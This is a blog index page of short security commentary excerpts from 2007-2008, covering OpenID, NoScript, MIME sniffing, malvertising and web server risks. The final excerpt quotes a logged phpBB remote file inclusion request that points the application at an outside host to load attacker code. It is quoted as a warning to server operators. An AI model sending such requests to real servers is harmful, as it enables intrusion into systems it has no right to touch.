Adblock Plus and (a little) more

Vulnerability or feature? · 2008-02-06 15:50 by Wladimir Palant

pdp over at GNUCITIZEN claims to have found a vulnerability in some common OpenID libraries. And I really tried hard to understand what he means and how it is related to the title of the article. In the end, I got the impression that he simply explains in a lengthy way that anybody could run an OpenID server and use it to log into OpenID-enabled services without having to register. Now isn’t this the whole purpose of OpenID?

Adblock Plus for MicroB - great, but... · 2007-12-28 00:20 by Wladimir Palant

Today I looked at my logs and noticed lots of unusual referrer spam. For example, I saw people coming to adblockplus.org from wikipedia.org — not a particular article but the main site. Adblock Plus is not that famous yet so I investigated a little.

Predictable whitelists strike again · 2007-11-05 17:18 by Wladimir Palant

A little more than half a year ago I wrote an article on how security solutions using whitelists are better than those using blacklists. At the same time I noted that even using whitelists is not always enough — for example when your whitelist is predictable and the attacker can make sure the whitelisting rule applies to him. The NoScript extension was the example I used, and its author reacted by adding “XSS protection”, assuming that this would invalidate my claims.

The hazards of MIME sniffing · 2007-04-29 03:30 by Wladimir Palant

Webmasters probably know one particularly “helpful” feature of Internet Explorer — if you happen to misconfigure your web server and it sends HTML files designated as text files, Internet Explorer will silently correct this mistake and display the files anyway. Of course, if you wanted to display HTML as text (because you want to show the source code, or because it really is a text file with HTML snippets in it), it will still be displayed as HTML. And if you, as a user of a non-IE browser, ever came across a misconfigured server that displays HTML/images/Flash as plain text — now you know why nobody bothered fixing the mistake. This feature is called “MIME sniffing” and many articles have been written about it, so I don’t need to repeat them.

Why you really should not hotlink · 2007-04-24 06:13 by Wladimir Palant

If you run a web site, you probably see this occasionally as well — people use your images, and instead of copying them over to their own servers they simply hotlink to your server. Now I don’t mind it when people use my images, nothing really worth protecting here. But I don’t like it when they start stealing my bandwidth and spamming my access logs.

Legal implications of security research · 2007-04-08 16:23 by Wladimir Palant

The Chilling Effect is quite an interesting read (yes, the article is a few months old but I only discovered it now). It shows nicely how security research on web applications is different from research on software you install on your computer. It also shows why responsible disclosure of vulnerabilities is so rare in this field. I also find it very interesting how it explains that most software is of a low quality.

80% of malware served through ads? · 2007-03-28 03:45 by Wladimir Palant

PC World published an article on the analysis done by security firm Finjan that shows that 80% of all malicious code is served through online advertising. Now, as with every statistic, their selection might not have been representative, and I have strong doubts that this number is accurate. But the trend is clear — there is much to be gained by infiltrating advertising networks, as it allows hackers to inject their code into many sites, including the ones where users don’t expect it. So the common advice to avoid visiting “shady” sites has once again lost some of its appeal: ads are displayed on “serious” sites as well. But I guess it will not stop most webmasters from trusting third-party content unconditionally by embedding scripts from third-party servers into their web pages. If these third-party servers get compromised, their web site will automatically be affected as well, with identity theft being the least serious consequence.

Usability vs. Security · 2007-03-25 01:53 by Wladimir Palant

Disclaimer: This post is only about using NoScript as a security solution, not as a way to block annoyances.

It seems that me pointing out the fundamental flaw in NoScript only inspired another round of madness — that’s the only name I can find for it. Giorgio Maone has developed a solution that will effectively stop untrusted sites from injecting JavaScript through XSS holes in whitelisted sites. He is currently testing it in a development build and, from what I can tell, it mostly delivers what it promises. Is that an achievement? Giorgio has obviously put much thought into this feature, but I still have to say: no.

Blacklists, whitelists, and security · 2007-03-15 04:13 by Wladimir Palant

I had a lengthy discussion with Giorgio Maone (author of the NoScript extension) about what is a security solution and what isn’t. The starting point was my statement that, while being excellent for getting rid of annoyances, neither Adblock Plus nor NoScript is really a security solution. Both have the potential, so why not?

Running a web server is dangerous · 2007-01-17 15:57 by Wladimir Palant

I guess some of you run a web server. Maybe you have noticed entries like this one in your logs:

"GET /forum/admin/admin_styles.php?phpbb_root_path=http://some.server.name/0wn/mail.txt?%5d\r HTTP/1.1" 302 5 "-" "-"
